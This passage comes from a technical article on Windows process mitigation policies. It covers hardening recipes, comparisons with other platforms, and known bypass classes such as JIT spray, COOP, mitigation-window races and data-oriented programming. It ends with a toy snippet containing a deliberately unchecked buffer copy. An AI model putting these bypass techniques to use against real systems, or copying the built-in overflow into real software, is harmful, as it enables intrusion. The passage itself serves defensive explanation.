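        # Models the child enabling ACG on itself shortly after startup.
        if self.skip_flag:
            return "success"  # short-circuits without installing the policy
        self.acg_on = True
        return "success"

    def virtual_alloc_rwx(self):
        return "blocked" if self.acg_on else "allowed"


def self_applied(attacker_races):
    child = ToyChild()
    if attacker_races:
        child.peer_write()  # attacker wins the window
    child.self_apply_policy()  # child reports success either way
    return child.virtual_alloc_rwx()


def applied_at_creation(attacker_races):
    child = ToyChild(policy_at_creation=True)
    if attacker_races:
        child.peer_write()  # same write, but the policy is already installed
    child.self_apply_policy()
    return child.virtual_alloc_rwx()
```

In both variants `self_apply_policy` returns "success", which is why neither the child nor its parent can tell from the return value that the race was lost.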

The second-generation bypass came faster than anyone expected. May 2018, Ivan Fratric publishes Bypassing Mitigations by Attacking the JIT Server on the Project Zero blog [@p0-fratric-jit-2018]. Once ACG forced JIT out of process, the new attack surface was the IPC channel and the JIT-server allocation address. Fratric writes: "we believe that any other attempt to implement out-of-process JIT would encounter similar problems." That sentence is the deeper lesson of the entire mitigation tradition: a new trust boundary -- between renderer and JIT process, between user and kernel, between content process and broker -- is a new attack class. You did not eliminate the attack surface; you moved it.

ACG plus CIG, then, closes "what code can run in this process": no unsigned image loads (CIG), no dynamic code generation (ACG), no executable allocations of any kind that did not originate as a signed PE on disk. That is a closed surface for the code dimension. But the attacker has more options than memory and signatures. There is the kernel surface beneath the renderer's syscalls. There is the legacy extension-point loader. There are fonts, image loads, side channels. Those are the smaller, operationally-critical mitigations -- the rest of the twenty.

9. The smaller, operationally critical mitigations

DEP, ASLR, CFG, CET, CIG, ACG -- that is the canonical six. But the PROCESS_MITIGATION_POLICY enum lists twenty-one values [@ms-process-mitigation-enum]. The other fourteen actual policies are not afterthoughts. Each one is a tombstone for a specific attack class that did not fit into "don't let the attacker write code" or "don't let the attacker pick the call target."

`ProcessSystemCallDisablePolicy` -- Disable Win32k System Calls

Edge content process, 2017 onward. The Win32k.sys driver implements the GUI subsystem and was, for many years, the single largest contributor to Windows kernel CVEs. A renderer process that does not draw windows can refuse Win32k syscalls entirely, eliminating an enormous swath of kernel attack surface for a compromised renderer. The Edge content process is the canonical user. The Edge sandbox blog documents the AppContainer (AC) architecture and capability model the renderer runs inside [@edge-sandbox-blog]; the policy enum entry itself is documented under SetProcessMitigationPolicy [@ms-setprocessmitigationpolicy]. Connor McGarr's 2025 deck addresses the Win32k surface explicitly: "Call targets in Win32k can be corrupted with a valid NT call target" -- which is the structural reason the policy exists [@mcgarr-bhusa25].

`ProcessExtensionPointDisablePolicy`

Disables legacy extension-point classes that have historically been DLL-injection vectors: AppInit_DLLs (registry-driven inject-into-everything), IME modules, Layered Service Providers (LSP, the Winsock provider chain), and SetWinEventHook/SetWindowsHookEx global hooks. Enabling the policy makes the loader refuse to map any DLL through these legacy paths into the process [@ms-setprocessmitigationpolicy, @ms-process-mitigation-enum]. This is one of the lowest-cost mitigations to enable for any process that does not knowingly need legacy IME or LSP integration.

`ProcessFontDisablePolicy`

Refuses non-system fonts. The historical motivation was a 2015 wave of ATMFD.DLL kernel-font-parser CVEs (the Adobe Type Manager font driver). Microsoft moved the font parser out of the kernel into user mode after that wave, and this per-process policy then refuses non-system fonts entirely for browser-class sandboxed processes that do not need them [@ms-setprocessmitigationpolicy].

`ProcessImageLoadPolicy`

Three loader-time flags, all about where a DLL can come from:

NoRemoteImages -- block DLLs whose path is a UNC \\server\share\dll. Eliminates a remote-DLL family that crossed administrative boundaries.
NoLowMandatoryLabelImages -- block DLLs whose file was written by a low-integrity-label process. A compromised sandboxed process could write a DLL to disk; this flag stops a peer broker from picking that DLL up.
PreferSystem32Images -- search \Windows\System32\ before the application directory in the DLL search order. Closes the DLL-search-order-hijack class, a very old attack surface.

All three are in [@ms-image-load-policy]. Together they collapse the DLL-loading attack surface to a small, well-controlled set of code paths.
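The three flags can be read as two load-time predicates and one ordering rule. The Python sketch below is a deliberately simplified model: the function names, the two-entry search order, and the integrity-label strings are assumptions for illustration, and the real loader's search order has more entries than shown here.

```python
from pathlib import PureWindowsPath


def is_unc(path):
    # PureWindowsPath reports a UNC share as a "drive" beginning with two backslashes.
    return PureWindowsPath(path).drive.startswith("\\\\")


def may_load(path, file_integrity="medium", no_remote=True, no_low_label=True):
    """Apply the NoRemoteImages and NoLowMandatoryLabelImages checks to one DLL."""
    if no_remote and is_unc(path):
        return False
    if no_low_label and file_integrity == "low":
        return False
    return True


def search_order(app_dir, prefer_system32=True):
    """Return a simplified two-entry search order for the PreferSystem32Images flag."""
    system32 = r"C:\Windows\System32"
    return [system32, app_dir] if prefer_system32 else [app_dir, system32]
```

With `prefer_system32=True`, a DLL planted in the application directory under a system DLL's name is never reached, because the genuine copy in System32 is found first.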

`ProcessStrictHandleCheckPolicy`

Causes the process to fault immediately on any use of an invalid handle (use-after-close, double-close, opaque-mismatch) [@ms-setprocessmitigationpolicy]. Handle bugs are an obscure but exploitable class -- a freed kernel object's handle can be reissued, and a process that does not detect this can be tricked into operating on an attacker-controlled replacement. Strict handle checking turns a subtle handle-confusion bug into an immediate crash, before the attacker can pivot.

`ProcessRedirectionTrustPolicy` -- RedirectionGuard

Mitigates symbolic-link, junction, and mount-point confused-deputy attacks. James Forshaw documented the attack family at Project Zero starting in August 2015 with the Windows 10 symbolic-link mitigations post [@p0-forshaw-symlink-2015]. Microsoft shipped the per-process mitigation a decade later, in June 2025 [@msrc-redirectionguard]. RedirectionGuard refuses to traverse a junction if the junction was created by a less-trusted user than the process performing the open -- closing the "a low-IL caller plants a junction; a high-IL service follows it" pattern that has been a steady source of local privilege escalation since at least Windows Vista.

RedirectionGuard's June 2025 ship date makes it the freshest entry in the PROCESS_MITIGATION_POLICY enum. The MSRC blog states the structural framing in one sentence: "Junctions remain the biggest existing gap. Outside of a sandbox, they can be created by standard users and target any folder on the system" [@msrc-redirectionguard].

`ProcessSideChannelIsolationPolicy`

Two distinct sub-mitigations [@ms-setprocessmitigationpolicy]:

IsolateSecurityDomain -- on context switch, issue an IBPB (Indirect Branch Predictor Barrier) and apply STIBP (Single Thread Indirect Branch Predictors) so that branch-predictor state is not shared across the security-domain boundary. This is the per-process Spectre v2 / MDS side-channel mitigation. Performance cost is real, in the 2-5% range on indirect-branch-heavy workloads, and is the reason this policy is opt-in rather than default.
DisablePageCombine -- prevents the kernel from merging identical physical pages across processes. Page-combining is a memory-saving feature that creates a cross-process side-channel: timing the cost of a write to a shared, copy-on-write page leaks whether the page was previously merged with another process's identical page.

`ProcessUserShadowStackPolicy`

The CET-on switch from section 6 [@ms-user-shadow-stack-policy]. Listed here for enum completeness.

`ProcessChildProcessPolicy`

Refuses any CreateProcess call originating from the process [@ms-setprocessmitigationpolicy]. Edge content processes and Chromium renderers enable this. The structural attack class it closes is "renderer is compromised; renderer spawns cmd.exe or powershell.exe and the attacker pivots to a non-sandboxed cousin." With ProcessChildProcessPolicy on, the renderer cannot spawn anything; the attacker has to either bypass within the sandbox or attack the broker process.

`ProcessPayloadRestrictionPolicy` -- EAF / IAF / ROP checks

The mitigations that EMET originally bundled, carried forward into Windows Defender Exploit Guard [@ms-defender-exploit-protection]: Export Address Filter (EAF), Import Address Filter (IAF), ROP-Stack-Pivot, ROP-Caller-Check, ROP-Sim-Exec. Five sub-mitigations that detect heuristic exploit patterns. The honest assessment: these are defense-in-depth against legacy 32-bit binaries that cannot be recompiled with CFG, XFG, or CET. On modern x64 binaries built with /guard:cf /CETCOMPAT, the payload-restriction checks are largely redundant. They remain useful as a backstop for unrecompilable third-party code that runs in a hardened parent process.

`ProcessASLRPolicy` and `ProcessDEPPolicy`

The per-process knobs on top of the system-wide foundations [@ms-setprocessmitigationpolicy]. ProcessASLRPolicy exposes BottomUpRandomization, HighEntropy, ForceRelocateImages, and other refinements -- useful for forcing a paranoid configuration on processes that load third-party DLLs without /DYNAMICBASE. ProcessDEPPolicy is a 32-bit-only vestigial knob; on x64 it does nothing because DEP is unconditionally on.

The other policies

ProcessActivationContextTrustPolicy (restricts manifest-driven activation contexts), ProcessMitigationOptionsMask (a meta-policy returning the mask of supported bits), ProcessSystemCallFilterPolicy (per-process syscall allowlist; rare in production), ProcessUserPointerAuthPolicy (the ARM64-Windows switch for ARM Pointer Authentication, comparatively discussed in section 11), and ProcessSEHOPPolicy (the per-process Structured Exception Handling Overwrite Protection knob -- a Vista-era mitigation predating the modern enum) fill out the enum to twenty-one values. None are individually load-bearing for the article's narrative; they exist for completeness of the kernel ABI.

Twenty policies plus a sentinel. The canonical six handle the control-flow primitives. The other fourteen handle adjacent surfaces. What does it look like when all of these are turned on at once, and which binaries actually do that?

10. What does a maximally hardened modern Windows process look like?

It is one thing to enumerate policies. It is another to ask: who actually turns them on? Where does Microsoft itself enable each one, and what is the structural reason it cannot be enabled on the others?

The fastest way to answer that question is a single matrix. Each column is a binary; each row is a PROCESS_MITIGATION_POLICY value. Each cell is either enabled, or the structural reason it cannot be. The matrix below summarizes the typical Get-ProcessMitigation output for representative binaries, with structural-can't reasons drawn from public Microsoft documentation, Matt Miller's Edge mitigation blog [@miller-acg-blog], and the policy-enum reference [@ms-process-mitigation-enum, @ms-setprocessmitigationpolicy].

| Policy | Edge content (`MicrosoftEdgeCP.exe`) | Chrome renderer | Outlook (Office) | Defender (`MsMpEng.exe`) | Recall (Windows AI service) | `Notepad.exe` |
| --- | --- | --- | --- | --- | --- | --- |
| DEP / ASLR (system foundation) | yes | yes | yes | yes | yes | yes |
| CFG | yes | yes | yes | yes | yes | yes |
| CET shadow stack | yes (strict) | yes | partial | yes | yes (strict) | yes (default) |
| ACG (`ProcessDynamicCodePolicy`) | yes | yes (with OOP JIT) | no -- COM/MAPI add-ins | no -- engine generates scanner code at runtime | yes | n/a (no JIT) |
| CIG (`ProcessSignaturePolicy`) | yes (`MicrosoftSignedOnly`) | partial -- plugins | no -- third-party add-ins | yes | yes (`MicrosoftSignedOnly`) | n/a |
| Disable-Win32k (`SystemCallDisable`) | yes | yes (renderer process) | n/a (GUI) | yes (no GUI) | yes (no GUI) | n/a (GUI) |
| Disable-Extension-Points | yes | yes | partial | yes | yes | default |
| Image-Load (all three flags) | yes | yes | partial | yes | yes | default |
| StrictHandleCheck | yes | yes | yes | yes | yes | yes |
| ChildProcess | yes | yes | no -- launches `winword`, etc. | yes (no children) | yes (no children) | no |
| FontDisable | yes | yes | n/a (renders fonts) | n/a | n/a | n/a |
| RedirectionGuard | yes (since 2025) | yes (since 2025) | partial | yes | yes | partial |
| SideChannelIsolation | optional | optional | optional | optional | yes (high-trust) | optional |
| PayloadRestriction (EAF/IAF/ROP) | yes | yes | yes | yes | yes | n/a |

The pattern that emerges from this matrix is the article's most important practical observation. The matrix is a threat-model artefact.

For any sandboxed-parser design -- a renderer, a font rasterizer, a PDF previewer, an image decoder -- the structurally-correct policy set is the union of what Edge and Recall enable. Both binaries parse untrusted content from the internet or from local files; both run in isolation; neither needs to load third-party signed DLLs, draw windows, or launch child processes. They can enable the full canonical recipe.

For any extensibility-by-design surface, the policy set is smaller and the threat model has to absorb the gap. Outlook cannot enable CIG because the MAPI plugin model and third-party COM add-ins are an existential product feature. Outlook cannot enable ChildProcess because it launches Word to open attachments. Defender cannot enable ACG because the scanner engine generates emulator bytecode, signature-compilation routines, and regex JITs at runtime -- it is, by design, a JIT for AV signatures, and that JIT runs in MsMpEng.exe. Chromium cannot enable CIG by default because of the third-party plugin model (Widevine, native messaging hosts, accessibility integrations).

Key idea: The canonical 2026 hardened-process recipe is CFG plus CET shadow stack plus ACG plus CIG plus Disable-Win32k plus Disable-Extension-Points plus Image-Load (all three flags) plus StrictHandleCheck plus ChildProcess plus, for parsers, FontDisable, plus RedirectionGuard for filesystem-interacting binaries. Every binary that misses one of these does so for a documentable structural reason -- which is exactly the threat-model artefact the matrix above produces.
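One way to treat the matrix as a threat-model artefact is to diff each binary against the recipe and keep the stated reason for every gap. The Python sketch below does that for three columns; the cell strings are transcribed from the matrix (with Edge's qualified "yes" cells simplified to "yes"), and the `RECIPE`, `MATRIX`, `gaps`, and `undocumented` names are hypothetical.

```python
RECIPE = [
    "CFG", "CET shadow stack", "ACG", "CIG", "Disable-Win32k",
    "Disable-Extension-Points", "Image-Load", "StrictHandleCheck", "ChildProcess",
]

# Cells transcribed from the matrix; anything not starting with "yes" counts as a gap.
MATRIX = {
    "Edge content": {policy: "yes" for policy in RECIPE},
    "Defender": {
        **{policy: "yes" for policy in RECIPE},
        "ACG": "no -- engine generates scanner code at runtime",
    },
    "Outlook": {
        "CFG": "yes",
        "CET shadow stack": "partial",
        "ACG": "no -- COM/MAPI add-ins",
        "CIG": "no -- third-party add-ins",
        "Disable-Win32k": "n/a (GUI)",
        "Disable-Extension-Points": "partial",
        "Image-Load": "partial",
        "StrictHandleCheck": "yes",
        "ChildProcess": "no -- launches winword, etc.",
    },
}


def gaps(binary):
    """Map each recipe policy the binary lacks to the matrix cell explaining why."""
    cells = MATRIX[binary]
    return {policy: cells[policy] for policy in RECIPE if not cells[policy].startswith("yes")}


def undocumented(binary):
    """List gaps whose cell is a bare 'partial' with no structural reason attached."""
    return [policy for policy, cell in gaps(binary).items() if cell == "partial"]
```

The `undocumented` list is the useful output for a review: those are the cells where the threat model still owes an explanation.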

This is the recipe the VBS and Trustlets sibling article in this series calls "user-mode hardened." The VBS-isolated Trustlets in the Secure Kernel layer have a separate, complementary surface; see that article for the kernel-side parallel.

Stacking the recipe is the best a 2026 user-mode process can be. But the attacker is still in the room. What survives even a fully-stacked process? What are the bypasses that work after every mitigation is on? Section 12 answers that. First, a quick comparison: what other operating systems do, and what they do differently.

11. What other operating systems do that Windows doesn't

Microsoft is not the only vendor with a per-process mitigation surface. Apple, Linux distributions, Chromium, and ARM-the-vendor are all in the same business, and they have made different structural choices. The honest comparison surfaces where Windows is ahead, where it is behind, and where the gap is not really a gap because the platforms solve slightly different problems.

Apple: Hardened Runtime, ARM PAC, and JIT entitlement. Apple shipped Pointer Authentication Codes (PAC) on the A12 (iPhone XS, September 2018) and on every Apple-silicon Mac from the M1 onward. PAC signs a code pointer with a per-process cryptographic key held in privileged hardware registers, storing the signature in the unused upper bits of a 64-bit pointer. The ARM PACIA, AUTIA, PACIB, and AUTIB instructions sign and verify [@wiki-armv83a]; an unsigned or wrongly-signed pointer that is authenticated with an AUT instruction and then used as a BR/BLR target faults. PAC is structurally stronger than CFG/XFG/CET because the key is held in privileged state and is unforgeable from user mode -- there is no in-memory bitmap for an attacker to work around.
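The sign-then-authenticate idea can be sketched with a keyed MAC packed into a pointer's upper bits. This Python model is illustrative only: real PAC uses a hardware cipher and a key the process cannot read, whereas here HMAC-SHA-256 is swapped in as a stand-in, the 48-bit address width and 16-bit signature are assumptions, and the `sign` and `authenticate` helpers are hypothetical.

```python
import hashlib
import hmac

ADDRESS_BITS = 48  # assumed usable address width; the upper 16 bits hold the signature
ADDRESS_MASK = (1 << ADDRESS_BITS) - 1


def _mac(key, address, modifier):
    # HMAC-SHA-256 truncated to 16 bits stands in for the hardware PAC algorithm.
    data = address.to_bytes(8, "little") + modifier.to_bytes(8, "little")
    digest = hmac.new(key, data, hashlib.sha256).digest()
    return int.from_bytes(digest[:2], "little")


def sign(key, pointer, modifier=0):
    """Model of a PACIA-style sign: pack the MAC into the pointer's upper bits."""
    address = pointer & ADDRESS_MASK
    return (_mac(key, address, modifier) << ADDRESS_BITS) | address


def authenticate(key, signed_pointer, modifier=0):
    """Model of an AUTIA-style check: strip the MAC or fail."""
    address = signed_pointer & ADDRESS_MASK
    if signed_pointer >> ADDRESS_BITS != _mac(key, address, modifier):
        raise ValueError("pointer authentication failed")
    return address
```

A caller would sign a function pointer once when it is stored and authenticate it immediately before the indirect branch; an attacker who overwrites the stored value without the key cannot produce matching upper bits except by guessing.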

Apple's JIT entitlement (com.apple.security.cs.allow-jit) is a stronger architectural answer than ACG [@apple-hardened-runtime]. Code that wants to JIT must declare it at build time and is granted a specific in-process W^X carve-out only if the entitlement is signed into the binary's code signature. The result: JIT capability is an attribute of the signed binary rather than a runtime API call, which closes the race-the-mitigation-window class structurally rather than by API migration (UpdateProcThreadAttribute).

Linux: SELinux, landlock, LLVM -fsanitize=kcfi, LLVM -fsanitize=cfi-icall. Forward-edge CFI in the Linux kernel first arrived in version 5.13 (June 2021) as an LTO-based jump-table implementation; the second-generation -fsanitize=kcfi scheme, which places a 32-bit type hash immediately before each function entry and does not require link-time optimization, replaced it in 6.1 (December 2022) [@lwn-corbet-kcfi]. The kCFI design is conceptually very close to XFG, but cheap enough to deploy on a kernel build because it sheds the LTO requirement. LLVM's user-mode -fsanitize=cfi-icall provides per-prototype CFI via jump-table dispatch but still requires LTO [@clang-cfi-doc]. SELinux operates at a different layer of the stack (mandatory access control on filesystem and IPC resources) and is not directly comparable to a control-flow defense -- it constrains what the process can do rather than what control flows the process can follow.
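The gap between a coarse valid-target check and a per-prototype hash check is easiest to see side by side. The sketch below is a toy model, not kernel code: the function names (`log_event`, `set_uid`), the prototype strings, and the FNV-1a hash are assumptions made for illustration. Real kCFI derives its 32-bit hash from the function's type in the compiler and checks it inline before the indirect call.

```javascript
// Hypothetical 32-bit FNV-1a over a prototype string, standing in for the
// compiler-generated type hash.
function typeHash(prototype) {
  let h = 0x811c9dc5;
  for (const ch of prototype) {
    h ^= ch.charCodeAt(0);
    h = Math.imul(h, 0x01000193) >>> 0;
  }
  return h;
}

// Each "function" carries the hash that kCFI would place before its entry point.
function makeFunction(name, prototype, impl) {
  return { name, hash: typeHash(prototype), impl };
}

const logEvent = makeFunction('log_event', 'void(u32)', (x) => `logged ${x}`);
const setUid = makeFunction('set_uid', 'void(s32)', (x) => `uid set to ${x}`);
const validTargets = new Set([logEvent, setUid]);

// Coarse-grained check (CFG-like): any known function entry is acceptable.
function coarseCall(target, ...args) {
  if (!validTargets.has(target)) throw new Error('not a valid call target');
  return target.impl(...args);
}

// Fine-grained check (kCFI/XFG-like): the target's hash must match the
// prototype the call site was compiled against.
function typedCall(expectedPrototype, target, ...args) {
  if (target.hash !== typeHash(expectedPrototype)) throw new Error('CFI type mismatch');
  return target.impl(...args);
}

// A call site compiled to call a void(u32) handler, with its pointer
// redirected to set_uid by a memory-corruption bug.
console.log(coarseCall(setUid, 0));               // uid set to 0
try {
  typedCall('void(u32)', setUid, 0);
} catch (e) {
  console.log(e.message);                         // CFI type mismatch
}
```

The coarse check passes because `set_uid` is a real function entry. The typed check fails because the hash stored with the target does not match the call site's prototype.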

Chromium / V8 sandbox. Chrome enables CFG on Windows, leans on ARM PAC on macOS, and is layering the V8 sandbox on top of all of them [@v8-sandbox-blog]. The V8 sandbox is a Chrome-side software defense: it confines a compromised renderer to a specific bounded memory range, so a renderer-process compromise cannot synthesize pointers to arbitrary out-of-sandbox memory. The V8 sandbox sits inside the renderer (different from the OOP-JIT trust boundary above it) and aims to make even a fully-compromised JIT-output bug non-fatal at the system level.
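One way to picture "cannot synthesize pointers to arbitrary out-of-sandbox memory" is to store offsets instead of addresses. The sketch below is a simplified toy under stated assumptions: `SANDBOX_BASE`, `SANDBOX_SIZE`, and the masking decode are hypothetical values and names chosen for illustration, not V8's actual layout or encoding.

```javascript
// Toy model of offset-based "sandboxed pointers".
const SANDBOX_BASE = 0x0000100000000000n;   // hypothetical base address
const SANDBOX_SIZE = 1n << 40n;             // hypothetical size; power of two so masking works

// Objects inside the sandbox store an offset, never a raw 64-bit address.
function decodeSandboxedPointer(storedOffset) {
  // Masking forces the result into [BASE, BASE + SIZE), whatever value
  // an attacker has written into the field.
  return SANDBOX_BASE + (storedOffset & (SANDBOX_SIZE - 1n));
}

function isInsideSandbox(addr) {
  return addr >= SANDBOX_BASE && addr < SANDBOX_BASE + SANDBOX_SIZE;
}

const honest = decodeSandboxedPointer(0x2000n);
const corrupted = decodeSandboxedPointer(0xfffffffffffff000n);  // attacker-chosen field value

console.log(isInsideSandbox(honest), isInsideSandbox(corrupted));  // true true
```

In this model the corruption still happens, but the resulting pointer can only land inside the bounded region.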

Android: Scudo allocator and ARM Memory Tagging Extension (MTE). MTE attaches a 4-bit tag to every 16-byte granule of memory and carries a matching tag in the unused upper bits of each pointer [@arm-mte-newsroom]. The CPU compares the two on every dereference: in synchronous mode, a tag mismatch raises an exception at the faulting instruction. Pixel 8 (October 2023) was the first consumer device with MTE-default-on for the kernel and key system services [@arm-mte-newsroom]. MTE catches the cause (use-after-free, linear overflow into the next allocation) rather than the symptom (control-flow hijack). It is conceptually orthogonal to CFI. The hard part is the performance cost of tag checks on every load and store, meaningful enough that Apple did not ship memory tagging on iPhone until Memory Integrity Enforcement arrived with the A19 generation in September 2025.
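A toy model makes the "cause rather than symptom" point concrete. This sketch assumes a 1 KiB heap, a sequential tag generator, and retag-to-zero on free; real allocators such as Scudo choose tags differently, and the function names here are hypothetical.

```javascript
// Toy model of memory tagging: one 4-bit tag per 16-byte granule,
// with the pointer's tag carried alongside the address.
const GRANULE = 16;
const memoryTags = new Uint8Array(64);      // tags for a 1 KiB toy heap
let nextTag = 1;

function tagRange(addr, size, tag) {
  for (let g = addr / GRANULE; g < (addr + size) / GRANULE; g++) memoryTags[g] = tag;
}

// Hypothetical allocator: tags the allocation's granules, returns a tagged pointer.
// Assumes addr and size are multiples of 16.
function alloc(addr, size) {
  const tag = nextTag;
  nextTag = (nextTag % 15) + 1;             // cycle through tags 1..15
  tagRange(addr, size, tag);
  return { addr, tag };
}

// On free, retag the memory so stale pointers no longer match.
function free(ptr, size) {
  tagRange(ptr.addr, size, 0);
}

// Every access compares the pointer's tag with the granule's tag.
function load(ptr, offset = 0) {
  const granuleTag = memoryTags[Math.floor((ptr.addr + offset) / GRANULE)];
  if (granuleTag !== ptr.tag) throw new Error('tag mismatch fault');
  return 'ok';
}

const faults = (fn) => { try { fn(); return false; } catch { return true; } };

const a = alloc(0, 32);
const b = alloc(32, 32);

console.log(faults(() => load(a)));         // false: in bounds, still live
console.log(faults(() => load(a, 32)));     // true: linear overflow into b
free(a, 32);
console.log(faults(() => load(a)));         // true: use-after-free
```

Neither faulting access redirects control flow, which is why a CFI check would never see them.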

Platform	Forward-edge	Backward-edge	Dynamic code	Memory safety
Windows (x64)	CFG (coarse), XFG (deprecated)	CET shadow stack	ACG	none structural
Apple (ARM64)	PAC (cryptographic, per-process key)	PAC (signs return addresses too)	JIT entitlement (declarative)	Memory Integrity Enforcement (EMTE) on A19-class hardware
Linux kernel	`-fsanitize=kcfi` (Linux 6.1+)	shadow stack on x86 CET; PAC-RA on ARM	not a kernel issue	Rust-in-kernel pilot
Android	PAC + BTI on supported SoCs	BTI / shadow call stack	sandboxed by selinux + seccomp	MTE on Pixel 8
Chromium	per-platform forward-edge	per-platform backward-edge	OOP JIT + V8 sandbox	layered

The honest accounting:

ARM PAC plus MTE is structurally stronger than CFG plus CET, because the cryptographic key (PAC) and the tag (MTE) are CPU-enforced state that no user-mode primitive can forge.
Apple's JIT entitlement is a stronger architectural answer than ACG because it is declarative at signing time rather than imperative at process startup.
SELinux/landlock is at a different layer (data access control) and is not directly comparable -- it solves a different problem.
Windows's mitigation surface is the most extensively deployed and most frequently extended per-process surface in industry use, by a wide margin. Twenty actual policies is more than any other vendor exposes to applications, and the API is stable, documented, and ABI-compatible across Windows versions back to Windows 8.

MTE catches what CFI cannot. A use-after-free that produces a controllable write -- but never violates the control-flow graph -- is invisible to CFG, XFG, CET, and PAC, but raises an MTE tag-mismatch fault on the very first attacker-controlled dereference. This is the structural reason memory-tagging is the emerging frontier and the structural reason a Windows-on-ARM-with-MTE future would close attack classes the current per-process surface cannot reach.

Stronger primitives exist on competing platforms. But Microsoft's per-process surface is the most extensively-deployed and most-frequently-extended in industry use. The bypasses are what tell us where the surface still leaks.

12. How attackers respond to a fully hardened process

Every generation of Windows mitigation has shipped with a named bypass within a year of its release. Here is the tradition, one named class per defensive generation.

Signed-DLL injection. Predates CIG. Find a Microsoft-signed DLL with a controllable side effect -- a DLL-search-order hijack against a signed Windows component, an Authenticode-padding write (CVE-2013-3900 family), or a signed driver with a known IOCTL privilege primitive. CIG sees a valid Microsoft signature and lets the DLL load. The mitigation is reactive: Microsoft's App Control / WDAC blocklist and the Driver Block List enumerate hundreds of banned-but-signed binaries; the list grows every quarter; the attacker's job is to find one not yet on it. This is one of the unsolved problems section 14 names.

JIT spray as a CFG bypass (Theori, 2016). The canonical writeup is Theori's Chakra JIT CFG Bypass [@theori-chakra-cfg-bypass]. The page itself states verbatim that the bypass targeted Microsoft Security Bulletin MS16-119 (October 2016) -- a Chakra fix that tightened the JIT's emit pattern. The technique: persuade the Chakra JIT to emit attacker-chosen byte sequences inside JIT-allocated code pages, at addresses the attacker has marked as valid CFG targets via the SetProcessValidCallTargets carve-out. The MS16-119 patch shrank the set of byte sequences a JavaScript program could induce the JIT to emit, but did not eliminate the technique structurally -- the structural fix was ACG (move the JIT out of process), section 8.

JIT spray: an exploitation technique in which an attacker writes JavaScript (or another JIT-targeted language) that causes the runtime JIT compiler to emit a long sequence of executable bytes at predictable addresses, where some of those emitted bytes form a useful gadget chain when reinterpreted at an offset. The classic JIT spray (Dion Blazakis, Black Hat DC 2010) used Adobe Flash's ActionScript JIT. The 2016 Theori work generalised the idea to use the JIT to emit *CFG-valid* function-entry bytes [@theori-chakra-cfg-bypass].

COOP -- code-reuse without a single CFG-invalid call. Discussed in section 5; recapped here as the first bypass class against coarse-grained forward-edge CFI [@coop-ieeesecurity-pdf]. The structural fix is fine-grained CFI: XFG, which Microsoft did not enforce by default and has since deprecated; LLVM's -fsanitize=cfi-icall and -fsanitize=kcfi; ARM PAC. The per-prototype hash check that XFG would have provided is exactly the property that closes COOP.

Race-the-mitigation-window (Forshaw + Fratric, 2017). Discussed in section 8; recapped here. The structural fix is UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY), which has the kernel install the mitigation policies at CreateProcess time, before any user-mode code in the child runs. The window between CreateProcess returning and the child calling SetProcessMitigationPolicy no longer exists, so there is nothing left to race. Documented in the Project Zero issue [@p0-issue-42450607] and the Exploit-DB mirror [@exploit-db-44467].

The CET-bypass research direction (McGarr, 2025). Connor McGarr's Black Hat USA 2025 deck Out of Control names the live research front: kCFG and kCET in the Windows kernel [@mcgarr-bhusa25]. The deck enumerates bypass classes that survive both kernel-mode CFG and kernel-mode CET: page-table modification of the kCFG bitmap (requires kernel write primitives the attacker may already have), abuse of unprotected global function-pointer arrays, structural limits of CET when the attacker is operating with kernel privileges in the first place. The user-mode mitigation surface is mature; the kernel-mode surface is where the live work happens. Hypervisor-Protected Code Integrity (HVCI) is what makes kCFG bitmap mutations harder -- the bitmap is in VTL1, and a VTL0 kernel write cannot touch it -- which is the cross-link to the VBS/Trustlets sibling article in this series.

Cross-context PAC oracles (Apple). Listed for comparative completeness. The PAC key itself stays out of reach, but a valid signature can still be forged if an attacker can call into a function that signs an attacker-controlled pointer with the per-process key and then read the result (a signing oracle). This is a known research class on Apple platforms and has produced several CVEs against Safari and iOS over the past five years.

The honest summary is that three classes of bypass survive a fully-stacked user-mode process today:

Signed-but-vulnerable DLL hijack -- defeats CIG by definition (publisher check, not content check).
COOP-style chains where the prototypes match the call site -- defeats CFG (coarse-grained) and is not closed by CET because the call/return invariant holds.
Data-only attacks -- which never violate any control-flow invariant at all, because no control transfer is hijacked.

What is the theoretical limit on what process mitigations can do? That is the next section.

13. What process mitigations cannot do

The Abadi paper that founded CFI in 2005 [@msr-cfi] is also the paper that establishes CFI's structural ceiling. CFI is, by construction, a control-flow property. That is exactly the property a sophisticated attacker can avoid violating.

The formal claim from Abadi, Budiu, Erlingsson, and Ligatti: enforcement of CFI restricts an attacker to control-flow transfers that respect the static call graph. The paper does not say every reachable program behavior is benign. CFI says "the attacker's control flow stays inside the legal CFG." It does not say "the legal CFG is benign." Any attack that operates entirely within the legal CFG is invisible to any CFI variant, including CFG, XFG, CET, PAC, and kCFI.

The lower bound on what an attacker can do while staying inside the legal CFG is given by data-oriented programming. The canonical paper is Data-Oriented Programming: On the Expressiveness of Non-Control Data Attacks by Hong Hu, Shweta Shinde, Sendroiu Adrian, Zheng Leong Chua, Prateek Saxena, and Zhenkai Liang, all of the National University of Singapore Department of Computer Science [@dop-paper]. The abstract is constructive and devastating: "such attacks are Turing-complete. We present a systematic technique called data-oriented programming (DOP) to construct expressive non-control data exploits."

Data-oriented programming (DOP): an exploitation technique in which the attacker corrupts non-control data -- authentication flags, length fields, function-table indices, loop bounds -- and lets the program's own legitimate, unmodified control flow execute the attacker's intended computation. Hu, Shinde, Adrian, Chua, Saxena, and Liang showed that DOP is Turing-complete: any computation can be expressed as a chain of data-only corruptions in a sufficiently-large program [@dop-paper]. No CFI variant -- CFG, XFG, CET shadow stack, ARM PAC, kCFI -- can detect a DOP attack, because no control flow is hijacked.

The mechanism: the attacker corrupts a current_user.is_admin flag rather than redirecting a function pointer. They corrupt a buffer_len field to enable a subsequent legitimate write past the allocation's intended end. They corrupt a next_state index to drive a state machine through an attacker-chosen path. The program's own logic, executing every instruction the compiler emitted and following every control transfer the static call graph allows, performs the attack. DOP is, in a precise sense, the program working as designed -- on data the attacker has chosen.
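The is_admin case can be sketched in a few lines. This is a toy model with a hypothetical memory layout (a 16-byte name buffer followed directly by a one-byte flag) and hypothetical function names; the point is that `handleRequest` runs exactly the same code path before and after the corruption.

```javascript
// Toy "process memory": a 16-byte name buffer followed directly by a
// 1-byte is_admin flag. Layout and names are hypothetical.
const memory = new Uint8Array(32);
const NAME_OFFSET = 0;
const NAME_SIZE = 16;
const IS_ADMIN_OFFSET = NAME_OFFSET + NAME_SIZE;

// The bug: copies caller-supplied bytes with no length check (a memcpy analogue).
function setDisplayName(bytes) {
  for (let i = 0; i < bytes.length; i++) memory[NAME_OFFSET + i] = bytes[i];
}

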